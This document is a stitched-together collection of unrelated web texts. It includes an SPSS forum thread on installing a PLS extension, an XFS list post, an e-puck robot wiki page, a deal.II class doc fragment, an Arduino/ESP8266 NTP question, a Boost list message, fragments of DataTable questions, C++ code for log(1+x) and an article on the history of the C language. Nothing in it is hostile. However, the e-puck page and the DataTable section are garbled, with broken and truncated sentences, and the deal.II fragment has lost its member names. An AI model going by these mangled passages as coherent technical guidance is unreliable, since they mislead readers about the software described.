Hi Jon, Thank you for the link - it works with the direct link you've provided here, but does not work on the main page. I think there is an error (as is mentioned on the main page by multiple members). As a result, I am also unable to download the supplementary tools needed to successfully run a PLS analysis for Python. I've searched the error (Error #1) in the previous feeds and you've mentioned that the error occurs because the proper .py files have not been downloaded. You guided the individual to the "supplementary" downloads - but again, this link from the main download page sends me to "My Files". Would you happen to know these files, so that I can locate them on the general download page you provided in the previous post? Thanks in advance, Jon. You have been a great help to so many people! M

Answer by JonPeck (4671) | May 07, 2013 at 03:37 PM

Would you clarify? I can't see any page errors. If you need the PLS extension command itself, it is here.
Answer by mtvinski (0) | May 07, 2013 at 06:59 PM

I have already downloaded that file from the previous link that you provided, but thank you for offering it again :) I have downloaded the PLS.zip, the numpy and the scipy files - but for some reason I am still receiving the following error:

Error # 6890. Command name: BEGIN PROGRAM
Configuration file spssdxcfg.ini is invalid.
Execution of this command stops.
Configration file spssdxcfg.ini is invalid because the LIB_NAME is NULL.

Based on the forum that you've extensively covered already - I see that this can be a common error. I am pretty sure the problem stems from not having downloaded the Plug-Ins - because I am unable to access the link from the homepage. When I click on "The Essentials and Plugins for IBM SPSS Statistics Version 20 for Python and .NET are available here. They have been updated to version 20.0.0.2 but are compatible with 20.0.0.0. NOTE: if you have the 20.0.0.0 or 20.0.0.1 version of the Essentials installed, you must uninstall it before installing this update." - I am directed to the My Files page, which is empty. Would you mind providing the link, so that I am able to download the plug-in? Hopefully this works. Thanks again! M

Answer by JonPeck (4671) | May 07, 2013 at 07:51 PM

The developerWorks team has reported that this is a variation on a problem they have found with different browsers. It appears that Firefox works, but IE is mangling the url. You can go directly to this link to get the V20 plugin/Essentials, but you might have to switch browsers.

Answer by mtvinski (0) | May 08, 2013 at 02:56 PM

Good morning Jon, Yes, I received the same feedback from IBM directly. I uninstalled all of the programs (except SPSS) and re-installed everything using Google Chrome. However, I am still seeing the following error when I try to run a PLS:

>Error # 6890. Command name: BEGIN PROGRAM
>Configuration file spssdxcfg.ini is invalid.
>Execution of this command stops.
>Configration file spssdxcfg.ini is invalid because the LIB_NAME is NULL.

I have downloaded the Essentials, the PLS.zip, the scipy and the numpy folders. I have placed all three of those files into the extensions folder of SPSS, as well as in the Python folder. Am I missing something? Should the Python folder be directly linked to the SPSS folders? One thing that I noticed was that when I tried the "import spss, PLS" command in the Python command line (as you've suggested on other feeds) I received the error File "C:\Program Files\IBM\SPSS\Statistics\20\extensions\PLS.py.", line 53, in <module> from and try again. Be sure to get the version matching your python version." Is there a simple step-by-step for how to get PLS to work using SPSS - including where the downloaded files go... what should go where... I have seen your document on putting scipy and numpy in the extension folder - but I don't think this is enough guidance. This is an incredibly arduous experience! Thank you in advance for all of your help. M

Answer by JonPeck (4671) | May 09, 2013 at 11:07 PM

You can't just download these files. You need to run the installer for the Python Essentials. It will take care of putting the infrastructure pieces in the right place. The next step is to download the PLS.zip file and follow the installation instructions in it. Finally, you need to get the numpy and scipy installables and run their install. It is true that this is more complicated than would be ideal, but once you have the Python Essentials working, you will have a lot of other commands that use the Essentials available. Thousands of people have gotten PLS working, so you can do it too with a little care.

Answer by mtvinski (0) | May 13, 2013 at 07:24 PM

Hi Jon, I have taken great care to get this installation process to work. These files were not just downloaded, they were installed as well (with the exception of numpy - there was no installation procedure with this file.
If I am wrong in this, then please direct me toward the installation link within the numpy folder that is available for download.) Alas, I went through and deleted all files and started again, using your instructions above. There must be an error in where the folders are being placed. The PLS.zip, numpy and scipy have been placed in the extensions folder of the SPSS folder. Yet when I run a PLS analysis, the output still has the following error:

>Error # 5712 in column 8. Text: spss
>A valid IMPORT subcommand name is expected but not found. Recognized
>subcommands are FILE, TYPE, KEEP, DROP, RENAME, and MAP.
>Execution of this command stops.

PLS q2a MLEVEL=S WITH q1g q1h q1i q1j q1k /CRITERIA LATENTFACTORS=5.

Extension command PLS could not be loaded. The module or a module that it requires may be missing, or there may be syntax errors in it.

Do you have any thoughts as to why this analysis is still not working? Does the Essentials folder have to be within the extensions folder as well? Does the Python folder have to be within the extensions folder? Thanks again for your time. I appreciate all of your help. M

Answer by JonPeck (4671) | May 13, 2013 at 07:55 PM

There is a superpack that includes both numpy and scipy, at least for certain versions, for example

numpy-1.6.1-win32-superpack-python2.7.exe
scipy-0.9.0-win32-superpack-python2.7.exe

This must be executed in order to install these. You can check the installation by running this in a syntax window:

begin program.
import numpy
import scipy
end program.

This message, however,

Error # 5712 in column 8. Text: spss
>A valid IMPORT subcommand name is expected but not found. Recognized
>subcommands are FILE, TYPE, KEEP, DROP, RENAME, and MAP.
>Execution of this command stops.

indicates that SPSS has not even shifted into Python mode. It is a complaint about the SPSS IMPORT command, which should not appear. The second error,

Extension command PLS could not be loaded.

is likely to be a problem with numpy and/or scipy.
You may get additional diagnostic information by running this program.

begin program.
import PLS
print PLS
end program.

46 people are following this question.
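Outside of SPSS, a similar import check can be run at a plain Python prompt first, to confirm that the packages PLS needs are importable by the Python installation SPSS uses. This is a small sketch of my own (plain Python, not SPSS syntax; the helper name is made up for illustration):

```python
import importlib

def importable(name):
    """Return True if the module `name` can be imported, else False."""
    try:
        importlib.import_module(name)
        return True
    except ImportError:
        return False

# The two packages the PLS extension depends on; diagnose each one.
for pkg in ("numpy", "scipy"):
    print(pkg, "is installed" if importable(pkg) else "is NOT installed")
```

If either package reports as missing here, the BEGIN PROGRAM check inside SPSS will fail for the same reason, so fix the plain-Python import first.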
https://developer.ibm.com/answers/questions/218380/ineffective-statistical-tools-link-for-downloads-f.html
Yo Barry,

xfsprogs/doc/CHANGES - Rename include/list.h to xfs_list.h so that other applications do not accidentally use it.

What was the problem here? This doesn't sound like the right fix - there should be no applications outside of the XFS userspace that use libxfs.h - that's what <xfs/xfs.h> is for (exactly this reason, preventing namespace collision, by reducing all the XFS internals being exposed).

Also, there seems to be lots of checkin mail not making it out to oss.sgi.com (let alone review mail), making it difficult for people to keep up to date with changes (and keep distros, like Debian, up to date) ... could y'all make some effort to keep us "on the outside" in the loop?

Oh, no one is updating oss.sgi.com/projects/xfs/{news,index}.html with recent changes either - seems like progress has come to a halt to those of us no longer in the secret cabal, anyway ;) ... just FYI.

cheers.

--
Nathan
http://oss.sgi.com/archives/xfs/2006-12/msg00239.html
E-Puck

Contents

- 1 Hardware
- 2 Software
- 2.1 Getting started
- 2.2 Library
- 2.3 Standard firmware
- 2.4 Programming
- 2.5 PC interface
- 2.6 Connecting to multiple robots
- 2.7 Examples
- 2.8 Bootloader
- 2.9 Other tools
- 3 ROS
- 4 Test and Results
- 5 Known problems
- 5.1 Re-flashing the bootloader on e-puck
- 5.2 Incorrect/unknown bluetooth PIN code
- 5.3 Battery isolation (for battery up to 2012)
- 5.4 Bluetooth and MacBook
- 5.5 Memory protection
- 5.6 Proximity noise
- 5.7 ICD2 programmer
- 5.8 Upload failed
- 5.9 Speed precision at very low speed
- 5.10 Mail archive
- 5.11 Bluetooth slowdown in Ubuntu
- 6 Links
- 7 Videos

Hardware: The updated e-puck library automatically handles the various hardware revisions in order to be compatible with the existing standard software:

#include <DataEEPROM.h>
/* read HW version from the eeprom (last word) */
int HWversion=0xFFFF;
int temp = 0;
temp = ReadEE(0x7F,0xFFFE,&HWversion, 1);

This project (src) is an example of how to write the last word of the EEPROM. left, the y axis points forward and z points upward: For users playing with e-puck HWRev1.3 and gumstix extension refer to section Accelerometer and gyroscope (e-puck_HWRev_1.3).

Microphone

From HWRev 1.3 the microphone sensitivity turned out to be a little different from the previous hardware revision; some empirical tests show that the difference is about ±15%, so be sure to adapt the thresholds in your applications if you

Serial communication

The communication between the robot and the computer can also be handled with a serial cable; the serial connector position on the robot, the related cable and the electrical schematic are shown in the following figures. In order to communicate with the robot through a serial line, the robot firmware must be implemented using the functions of UART2 instead of the ones of UART1 (BT). All the functions implemented for UART1 are also available for UART2, so it's only a matter of changing the function call names.
Anyway the standard firmware already contains a mode that communicates over the serial line, selected with position 11; in this mode you can configure the BT.

I2C communication

The camera, the ground sensors extension, the accelerometer (e-puck HWRev 1.3 only) and the gyro (e-puck HWRev 1.3 only) are connected to the I2C bus as slave devices (the microcontroller is the master). The y command of the Advanced sercom protocol can be used to read the register values of these sensors. For instance you can read the camera id with the following commands: y,220,0 and y,220,1 that return respectively 128=0x80 and 48=0x30 (id=8030). In the same way you can read any register with the general command y,220,REG_ADDR. For the accelerometer you must use 60 as device address ( y,60,REG_ADDR) and for the gyro you must use 212 ( y,212,REG_ADDR). The device address value to be used with the y command is obtained by shifting the 7-bit I2C address of the device one position left; for example the camera 7-bit address is 0x6E, and by shifting one position left we get 0xDC=220.

Batteries

This battery doesn't fit perfectly in older chargers, but it can be inserted anyway in the charger in order to make a good contact and charge it; when the contact is ok you will see the led turned on.

Charger circuit diagram

The circuit diagram of the e-puck charger is available on the following link charger-circuit-diagram.png.

Software

for Linux or teraterm for Windows)

Library

The embedded software running on the e-puck is continuously extended and managed in the following git repo. The repo comprises a complete library to work with all the sensors mounted on the e-puck and is the basis for many demos. You can download the library documentation from the following link e-puck-library.pdf.
The content of the repo is the following:

- library: this is the low level library of the e-puck
- program:
  - "Bluetooth mirror": interact with the Bluetooth chip through serial cable
  - "BTCom": basically it is the "asercom" implementation, refer to Advanced sercom protocol
  - EPFL demo project: some nice demos bundled in one project, such as sound source location, obstacle avoidance and color blob detection (red and green). Some of these demos are included in the GCtronic standard firmware.
  - GCtronic standard firmware project, refer to section Standard firmware
- tool:
  - computer-side and e-puck side bootloader
  - matlab interface/monitor for e-puck
  - C++ interface/monitor for e-puck

In order to download a snapshot of the repo, go to the page and then click on the green button named Clone or download and select Download ZIP as shown in the following figure.

Structure

As previously mentioned the git repository includes a library to which many demos are linked. Only updates to this library that will be useful to other people and/or correct errors should be committed; some demos of this wiki make changes to the library for the sole purpose of running the demo and thus they aren't committed to the repo. In order to separate the original e-puck library from what is modified in the library for the current demo, all the projects (created with MPLAB) share the same structure, that is they have to be placed within the program folder of the repository and must contain only the files of the library (and their dependencies) that have been modified. An example of this structure is shown afterwards:

- e-puck-library
- included.

Standard firmware

The robot is initially programmed with a firmware that includes many demos that can be started based on the selector position: -. The pre-built firmware is available from DemoGCtronic-complete.hex.
You can have a look at the source code from the following link; beware that the project is actually included in the e-puck library repository, refer to section Library to download it.

Project building

In order to build the project you need to install the MPLAB X IDE and the related compiler, refer to section Programming: MPLAB X. The standard firmware project is based on the e-puck library (refer to the Library section). To build the project follow these steps:

1) Download and extract the e-puck library repository (refer to section Library), let's say in the folder e-puck-library; you should have the following situation:

- e-puck-library
  - library
  - program
    - ...
    - DemoGCtronic-complete
  - tool

2) Open MPLAB X, then click File=>Open Project and select the project file demoGCtronic.X you can find in e-puck-library\program\DemoGCtronic-complete. If you're asked to upgrade the project to the current IDE version, click yes to confirm.

3) Right click on the project name (on the left panel) and select Properties as shown in the following figure:

4) Select the XC16 compiler from the Compiler Toolchain section and then click OK as shown in the following figure:

5) Open the project properties once more (right click on the project name and then select Properties), a new configuration will be available for the XC16 compiler. On the left panel select xc16-gcc, then on the right specify Memory model and verify that the Code model is set to Large. Confirm with OK as shown in the following figure:

6) Now you can build the project by clicking on the Build project button (hammer icon on the top) or by pressing F11; if all is working you should end up with a successfully built firmware as shown in the following figure:

Programming

MPLAB X

If you are interested in development of embedded applications, you should first choose an adequate development environment.
One of the best known IDEs is the MPLAB Integrated Development Environment that you can download for free from the Microchip site; Microchip also offers the C compiler for free. One big advantage of this IDE is that it is multiplatform (Windows, Linux, Mac) and the compiler is also available for each platform. To work with the e-puck software you need to:

- download and install the MPLAB X IDE; during installation select also MPLAB IPE to be installed, it is a nice utility to have
- download and install the compiler, it must be the MPLAB XC16 (supports all 16-bit PIC MCUs and dsPICs)

Useful information related to the compiler can be found in the MPLAB XC16 C compiler user's guide.

Aseba

Aseba is a set of tools which allow novices to program robots easily and efficiently, refer "e-puck-library mac_address is the address that you previously annotated (e.g. 10:00:e8:c5:61:c9).

Connecting to multiple robots

A Python example is available for e-puck2 in the following section PC side development: Connecting to multiple robots. This example is also compatible with the e-puck1 robot. Examples).

Still images

This demo program is optimized to let the robot handle images with resolution up to 640x.

Bootloader

- Windows: Tiny Bootloader v1.10.6 or Tiny Multi Bootloader+
- Linux: epuck-bootloader-linux.zip - requirements: sudo apt-get install libbluetooth-dev
- Mac OS: actually it is a Perl script, thus in principle it could be used also in Linux and Windows; after pairing with the robot, you should issue a command similar to ./epuckupload -f firmware.hex /dev/tty.e-puck_3675-COM1 and then press the reset button on the robot

Other tools

From the official e-puck site you can find information about other software tools available for the e-puck robot in the following link.

Local communication

An example of such tools is libIrcom, a local communication library exploiting the proximity sensors placed around the robot to modulate infrareds.
If a higher throughput and longer communication distance are required, there is the range and bearing extension designed for this purpose.

epuck

epuck driver for python, we developed another ROS node based on roscpp that has the same functionalities; the code (together with the VirtualBox Extension Pack)

Webots

The Webots simulator integrates a ROS controller that publishes the sensor data of the e-puck robot in ROS, then we can exploit the multitude of packages available in ROS to process the sensor data and simulate the behavior of the e-puck by issuing

E-puck gumstix extension

For more information on how to use ROS with the e-puck gumstix extension refer to section.

Test and Results

(master=selector position 9, slave=selector position 4). The slave robot is intended to be programmed with the standard firmware (selector position 3). There are various modes available in this demo, depending on the selector position:

- 0: search for an e-puck1 or e-puck2 and connect to the first one found, then send some commands to it through the advanced sercom protocol
- 1: receiver mode (template)
- 2: connect directly to an e-puck1 (no search is accomplished) and then send some commands to it
- 3: connect directly to an e-puck2 (no search is accomplished) and then send some commands to it

e-puck balancing

The users can transform the e-puck into a self-balancing robot by applying some mechanical modifications as shown in the following figure. Here are the 3d models of the wheel tyre extension and spacer. For more information on the assembly please contact us. Click to enlarge

Here is a video of the e-puck trying to self balance; this is only a starting point to demonstrate the feasibility, so you can take the code (MPLAB X project) and improve it.
e-puck and Arduino

The Arduino boards are widely used in the hobby community and you can extend the functionality of a board by using the so-called shields; there are tons of shields like WiFi, SD reader/writer, battery, XBee, GSM, speech recognition, rfid, ... there is a shield for everything (almost). A test project that works without any shield is available in the following link Arduino IDE (1.6.6) test project; this demo continuously rotates the robot right and left. It works with the same robot firmware as the previous demo." from the shop.

Known problems

Re-flashing the bootloader on e-puck

In some cases it was reported that the internal bootloader on e-puck was corrupted due to a malfunction of the last code upload. In those cases the bootloader (DemoGCtronic-complete-4bba145+bootloader.hex) has to be re-flashed on the robot via cable (see figure) with ICD2 or ICD3 and MPLAB IDE or compatible HW and SW. See the procedure (Instruction re-program bootloader.pdf) and in case of need contact info[at]gctronic.com.

Uncorrect insipiration. You can get the serial cable from the shop. "memory protection" still blocks and.

ICD2 programmer

The Microchip ICD2 programmer P/N 10-00319 isn't supported on 64-bit OS.

Speed precision at very low speed

The e-puck motors are step motors. To save energy, the motor phases/steps at low speed are not energized all the time but just partially. This might affect the speed precision at speeds below 200. If one has specific needs at that low speed and wants the single steps to be more energetic, then the TRESHV and MAXV constants in the file \motor_led\advance_one_timer\e_motors.c within the e-puck library need to be adapted (decrease their value). Alternatively the power save feature can be completely disabled by commenting out the POWERSAVE constant.

Mail archive

You can have a look at a mail archive (February 2007 - December 2016) regarding the e-puck robot from the following link.
In this archive you can find problems encountered by users and related solutions. Bluetooth slowdown in Ubuntu If you experience a slowdown using the Bluetooth in Ubuntu try removing the package modemmanager with the following command: sudo apt-get remove modemmanager Links
https://www.gctronic.com/doc/index.php?title=E-Puck&amp%3Bdirection=prev&amp%3Boldid=1266&printable=yes
#include <deal.II/base/function_lib.h>

Given a wavenumber vector, generate a sine function. The wavenumber coefficient is given as a \(d\)-dimensional point \(k\) in Fourier space, and the function is then recovered as \(f(x) = \sin(\sum_i k_i x_i) = \mathrm{Im}(\exp(i\, k \cdot x))\).

The class has its name from the fact that it resembles one component of a Fourier sine decomposition.

Definition at line 682 of file function_lib.h.

Constructor. Take the Fourier coefficients in each space direction as argument.

Definition at line 1878 of file function_lib.cc.

Definition at line 1888 of file function_lib.cc.

Return the gradient of the specified component of the function at the given point.

Reimplemented from Function< dim >.

Definition at line 1900 of file function_lib.cc.

Compute the Laplacian of a given component at point p.

Reimplemented from Function< dim >.

Definition at line 1912 of file function_lib.cc.

Stored Fourier coefficients.

Definition at line 716 of file function_lib.h.
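As a cross-check of the formulas above, independent of deal.II: for f(x) = sin(k.x) the gradient components are k_i cos(k.x) and the Laplacian is -|k|^2 sin(k.x). The sketch below (plain Python, with an arbitrary wavenumber vector chosen only for illustration) verifies the gradient formula against central finite differences:

```python
import math

k = [1.0, 2.0]   # arbitrary 2-D wavenumber vector (an assumption)
x = [0.3, -0.7]  # arbitrary evaluation point

def dot(a, b):
    return sum(ai * bi for ai, bi in zip(a, b))

def f(p):                 # f(x) = sin(k . x)
    return math.sin(dot(k, p))

def grad(p):              # grad_i f = k_i * cos(k . x)
    return [ki * math.cos(dot(k, p)) for ki in k]

def laplacian(p):         # sum_i d^2 f / dx_i^2 = -|k|^2 * sin(k . x)
    return -dot(k, k) * math.sin(dot(k, p))

# Finite-difference check of the gradient formula.
h = 1e-6
for i in range(len(x)):
    xp = list(x); xp[i] += h
    xm = list(x); xm[i] -= h
    fd = (f(xp) - f(xm)) / (2 * h)
    assert abs(fd - grad(x)[i]) < 1e-6
```

The same pattern extends to any dimension, matching the templated class above.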
http://www.dealii.org/developer/doxygen/deal.II/classFunctions_1_1FourierSineFunction.html
Hi, I have a long program for an irrigation system running on an Arduino Uno. I'm using an RTC DS1307 module, however it drifts by more than 1 minute every day, so I purchased an ESP8266 module to periodically update the time. As I'm using the Time.h library together with the TimeAlarms library, I see that there is a setSyncProvider(getTimeFunction) command to synchronize time periodically. I've tested the ESP8266 separately and successfully got NTP data on the ESP8266. But it works based on the delay inside the loop of the ESP8266 code, so for now it gets NTP data every second. I can send this data via the serial port, listen for it on the Arduino periodically, and update the Arduino/RTC time when data is received from the serial port. However that does not make much sense, because I want to update the time only once a day, and listening on the same port all the time for data that will arrive only once a day feels like too much. So I guess it would be better if the Arduino requests the NTP time from the ESP8266 and the ESP replies with the new value only when it is asked. How would that be possible? Any sample code for Arduino and ESP8266 I should use? Below is the code I've tested with the ESP8266 that gets NTP time every second.

#include <NTPClient.h>
#include <ESP8266WiFi.h>
#include <WiFiUdp.h>

const char *ssid = "Wifi Name";
const char *password = "Password";
const long utcOffsetInSeconds = 14400; //Dubai time zone is GMT+4 = 4*60*60 = 14400 seconds difference

char daysOfTheWeek[7][12] = {"Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"};

String formattedDate;
String dayStamp;
String timeStamp;

void loop() {
  timeClient.update();
  formattedDate = timeClient.getFormattedDate();
  Serial.println(formattedDate); //Return will be like 2019-09-01T23:56:36Z
  delay(1000);
}
https://forum.arduino.cc/t/what-is-the-best-way-to-get-npt-data-to-arduino-using-esp8266/609181
From: Joaquin M Lopez Munoz (joaquin_at_[hidden])
Date: 2004-03-30 16:12:19

Pavol Droba <droba <at> topmail.sk> writes:

> > > > > NAMESPACE
> > * Proposal: boost::container::multi_index
[...]
> I have just one remark about the namespace usage. IMHO it is an overkill to
> provide a special namespace for every container.
> I think that putting all these containers into the boost::container namespace
> is verbose enough.
>
> There has been a very similar discussion about the algorithm namespace
> (namely the string algorithm library). The current situation is that everything
> resides in the boost::algorithm namespace and interface names are lifted to the
> boost namespace. This model has been settled as a reasonable compromise.
>
> It is worth mentioning that there are generally more free-standing names in
> algorithm libraries than in the container ones. So if the name-clashing problem
> is not here, I don't see it in the container case.
>
[...]

I think indexed_set (or composite_container) cannot live without a namespace of its own. There are many utility classes around the container with names like (to pick a few)

* tag
* index
* member
* identity

These are *public* classes. Would you choose to have them in boost::container?

Joaquín M López Muñoz
Telefónica, Investigación y Desarrollo

Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
https://lists.boost.org/Archives/boost/2004/03/63357.php
It is working correctly, but I want to use this functionality in Java instead of PHP, so please help me: how can I use this?

How to convert the DataSource of a ComboBox to a DataTable in VB.NET? I know how to assign a DataTable to a ComboBox. In this case I need to do it the opposite way, like:

Dim dt As DataTable = combobox1.DataSource

Is this possible? --------------Solutions--------- main DataTable called dt and two other DataTables called successBatch and failBatch. The latter two are created as Clones of the main one. I would like to remove all the DataRows that are inside successBatch and failBatch from dt. This used

This question already has an answer here: When should I load the collection from database for h:dataTable 1 answer I'm trying to render a list of products in a .xhtml page, from my database in Postgres: I'm using the JSF tag h:dataTable. Unfortunately

I want to get the unmatched records by comparing two DataTables, e.g.:

Table 1
TransID BookingID BookingStatus BookingType
1 11 Y Paid
2 12 N UnPaid
3 13 N Paid

Table 2
TransID BookingID BookingStatus BookingType
1 11 Y Paid
2 12 Y UnPaid
4 14 Y Paid

I

I need to make a validation in a datatables array: if typeoftransfer === '2' then return 'LL', elseif typeoftransfer === '3' return 'SA'. I have been reading the datatables documentation and didn't find how to do it. Here is my array code on the server proc have following code:

DataTable datTable3 = new DataTable();
datTable3 = datTable1.Clone();
datTable2.Merge(datTable1);
datTable3 = datTable2.GetChanges();

What I want to do is: compare DataTable1 with DataTable2 and when there are rows in DataTable

I had implemented an editable p:dataTable. After I click on the edit button and change the value, the Edit and Cancel buttons are not working, and the row just stays open for editing. May I know what mistake I am making? The code is <p:panel> <p:messages id=&
I have that public class Pair inside public class Struct on both Server and Client. [Serializable] public class Struct { public class Pair I am using datatables in my project and it is simply amazing. Kudos! I have faced an issue which I haven't found satisfactorily answered anywhere in my quick search. I am using server side option to filter and search the data. This is my query, which I am looking for the cleanest way availble to convert a List into a datatable. I came across some articles which was basically combination of Foreach +Reflection. Not a bad option IF there is no other cleaner way to do it. After some research I came I have one DataTable Datatable dt; There are 10 columns there, including the ID of the row. And in the view state I have a generic list like: List<MyObject>; Myobject has some fields including the same ID. The datatable has ALL items, and the l I have a datatable with data and filter The filter works perfecly, when I white some that doenst exists, the datable is empty, but when I reload the page the data doenest show in the datatable This is my code XHTML <p:tab title="#{caseList['caseMa I am trying to use a jquery datatable using ajax sourced data in my application. My table html would be <table id="dynaFormVersionTable" class="table table-striped table-hover dt-responsive" cellspacing="0" width="100%"> <thead> <tr How would I split up a DataTable that has dynamic column count and names Ideally I'd like a method signature like List<DataTable> SplitColumnOnColumn(DataTable table, int count) | columnFirst | columnSecond | columnThird | columnFourth | column var itemAmountList = _itemAmountvalue.Split(','); var listItemDescriptionValues = _itemDescriptionvalue.Split(','); IEnumerator enum1 = itemAmountList.GetEnumerator(); IEnumerator enum2 = listItemDescriptionValues.GetEnumerator(); DataTable dtCustomI I'm displaying data from database in JQuery data tables.i want to display latest inserted record in top. 
My SQL query is working fine,but however JQuery data tables sorting is not happening.....so i want to sort data DESC order for data tables. Where I am trying to add column to datatable whose value is derived from some mathematical computations on other columns. I am doing as below: dt.Columns.Add("OpeningBalance", GetType(Decimal), "Amt01-" + "Amt02-amt03") What I need is to subtract amt03 to
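For the "typeoftransfer" question above, a common approach with jQuery DataTables is a columns.render callback that maps raw values to display strings. This is a hypothetical sketch, not an answer from the page; the column/field names come from the question:

```javascript
// Hypothetical sketch: map raw "typeoftransfer" codes to display labels.
function renderTransferType(data) {
  if (data === '2') return 'LL';
  if (data === '3') return 'SA';
  return data; // fall back to the raw value
}

// In a DataTables column definition this would be wired up as:
// columns: [{ data: 'typeoftransfer', render: renderTransferType }]
console.log(renderTransferType('2')); // LL
console.log(renderTransferType('3')); // SA
```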
http://www.dskims.com/tag/datatable/
Stand-alone C++ code for log(1+x)

If p is very small, directly computing log(1+p) can be inaccurate. Numerical libraries often include a function log1p to compute this function. The need for such a function is easiest to see when p is extremely small. If p is small enough, 1 + p = 1 in machine arithmetic, and so log(1+p) returns log(1), which equals zero. All precision is lost. If p is small but not so extremely small, direct computation still loses precision, just not as much.

We can avoid the loss of precision by using a Taylor series to evaluate log(1+p). For small p, log(1+p) ≈ p − p²/2, with an error roughly equal to p³/3. So if |p| is less than 10⁻⁴, the error in approximating log(1+p) by p − p²/2 is less than 10⁻¹². So we could implement the function LogOnePlusX as follows. The following code first appeared in A literate program to compute the inverse of the normal CDF.

    #include <cmath>
    #include <sstream>
    #include <iostream>
    #include <stdexcept>

    // compute log(1+x) without losing precision for small values of x
    double LogOnePlusX(double x)
    {
        if (x <= -1.0)
        {
            std::stringstream os;
            os << "Invalid input argument (" << x << "); must be greater than -1.0";
            throw std::invalid_argument( os.str() );
        }

        if (fabs(x) > 1e-4)
        {
            // x is large enough that the obvious evaluation is OK
            return log(1.0 + x);
        }

        // Use Taylor approx. log(1 + x) = x - x^2/2 with error roughly x^3/3
        // Since |x| < 10^-4, |x|^3 < 10^-12, relative error less than 10^-8
        return (-0.5*x + 1.0)*x;
    }

This code is in the public domain. Do whatever you want to with it, no strings attached. Other versions of the same code: Python, C#

Stand-alone numerical code
http://www.johndcook.com/cpp_log_one_plus_x.html
Like most programming languages, C was developed out of dissatisfaction with existing programming languages. Back in 1969 – when the idea of developing an operating system using a higher-level programming language was still novel – Dennis Ritchie was beginning to realise the shortcomings of the B programming language as he was working on recoding the Unix operating system for a new architecture in a higher-level language. B had been designed for a different computer generation by Ken Thompson, who also contributed to C. The language was word-addressed instead of byte-addressed, and lacked floating point support. Since the early colonists of the digital era were not spoilt for choice as we are these days, they decided to create a programming language which better suited their needs. Thus C was in use as early as 1972–1973; however, this was the C before any serious efforts at standardisation were made, and it would look odd to today's C developers. It was only with the publication of 'The C Programming Language' by Brian Kernighan and Dennis Ritchie in 1978 that C finally got a widely available manual for its syntax. The first 'official' C standard, ratified by ANSI, was published in 1989, and is still supported by popular C compilers such as GCC. This edition of the language is so popular that it is still the default syntax of the current (4.9) version of GCC. It is commonly referred to as C89 or C90. Since then C has had two major revisions, once in 1999 (known as C99), and again in 2011 (known as C11). The upcoming 5.0 release of GCC will finally adopt the latest C11 edition of C as the default. Given how old it is, it is a testament to the design of the language, and the skill of its designers, that it is relevant to this day.

Dennis Ritchie (standing) and Ken Thompson working on the first computer for which they designed C (the PDP-11).

Significance

It is hard to overstate the significance of C in the landscape of computing today.
Nearly every popular programming language used today, whether it be JavaScript, Java, C#, PHP, Objective-C, or even Python, is inspired by conventions set by C. Compared to the languages it inspired, though, C is significantly low-level. C improves the readability, maintainability and ease of development of code significantly compared to Assembly, and is far more portable, despite giving developers nearly as much power as Assembly does. C gives developers low-level access to machine hardware with minimal abstraction, and pointers in C let the developer work directly with raw memory locations. As you can imagine, this makes it the perfect candidate for system programming. Few other languages are as suitable, or as widely used, for writing low-level code such as operating system kernels or device drivers. One only needs to look at the three major operating system families to see proof of that. The Linux kernel, the OSX kernel (Mach / Darwin) and the Windows (NT) kernel are all mostly written in C, with some Assembly thrown in. In fact, when one encounters a kernel not written in C, it is often a point to highlight. Another field where C has a significant market share is in programming embedded systems: low-level systems such as the ones that control various subsystems in cars, from ABS to managing fuel / air mixtures. Since these systems are mission critical, and you wouldn't want a blue screen of literal death, the version of C used in such systems is often a restricted one. After all, you can't really patch your car to car 1.0.1 if they detect a bug later on! It is also an incredible point in C's favour that it is the language in which the interpreters of popular languages such as Python, PHP, Ruby and Lua are written. The deeper you go into computer programming, the more likely it is that you will find copious amounts of C.
Nearly every electronic device you touch that has some kind of embedded microcontroller or microprocessor in all likelihood runs at least some code that was once stored in a .c file. Whether it's a hobby project or mission-critical code running on an embedded device, chances are it was written in C.

Hello World

    #include <stdio.h>

    int main(void)
    {
        printf("Hello, world!\n");
        return 0;
    }

Hello World is possibly one of the simplest programs you can write in any language, and C is possibly one of the more verbose ones. If you just want something that compiles – with warnings – and throws "Hello, world!" to the screen though, you can even get away with just the following (with some compilers):

    main()
    {
        printf("Hello, world!\n");
    }

Sort

    void insertion_sort(int *arr, const size_t arr_len)
    {
        for (size_t i = 1; i < arr_len; i++) {
            int elem = arr[i];
            size_t j = i;
            for (; j > 0 && elem < arr[j - 1]; j--) {
                arr[j] = arr[j - 1];
            }
            arr[j] = elem;
        }
    }

Insertion sort in C isn't exactly complex. In the above example we are using the newer syntax which allows us to define variables where they are used rather than at the beginning of the function. This has been supported since C99.

Tools and Learning Resources

The age of C has another significant advantage: there is a plethora of tutorials, books, videos, and the like available for C, and many of them are absolutely free. There are also dozens of compilers and IDEs available for C, most free if not open source. However, of greatest importance —for desktop OSs at least— are Microsoft's Visual C++ compiler, the GNU Compiler Collection (GCC), and the newer Clang. Clang aims to be a drop-in replacement for GCC, and features a similar interface. It is gaining popularity, and is now preferred by a number of BSDs and by Apple —which is unsurprising since Apple is one of its primary developers. If you are using Windows, you have a couple of options. Firstly, Microsoft's C / C++ compiler ships with the Windows SDK and with their Visual Studio IDE.
The SDK is free, and a free version of the Visual Studio IDE is available, which has recently expanded its feature set quite a bit. If you intend to develop purely for Windows, wish to use Windows-specific features, or wish to write extensions for parts of Windows itself, you will need this. Even otherwise, one of the hallmarks of a well-developed piece of software is its ability to compile under multiple different compilers by different vendors. Microsoft's new Visual Studio Community edition brings the free version of the IDE closer to the paid offering. On OSX the development tools are available with the SDK, and can be installed from the OSX DVD, or downloaded via the Mac App Store. This includes the XCode IDE. If you are using Linux, chances are the development tools and basic libraries for C are already installed; if not, they can definitely be found in your distro's repositories and are just a command or two away. Also, if you're using Linux you should probably know how to take it from here! Another good IDE for C and C++ is QtCreator by Digia. It is part of the Qt project, but doesn't require you to use Qt itself. Best of all, it is free, open source, and cross-platform. XCode is Apple's free IDE for building OSX and iOS apps. If you are using Linux / OSX, C documentation is basically built into your operating system! The documentation for any function is just a single command away. Linux (and Unix and OSX) include the 'man' or manual command that can be invoked on the command line to open documentation on many topics. Many people are familiar with the command for looking at the usage instructions for command-line programs, but it works equally well for C functions! Try it: if you are running a *nix OS, type 'man printf' and find an instant usage guide to that function in C. Most C libraries you install will also install a documentation package, so this should work for any development library you have installed.
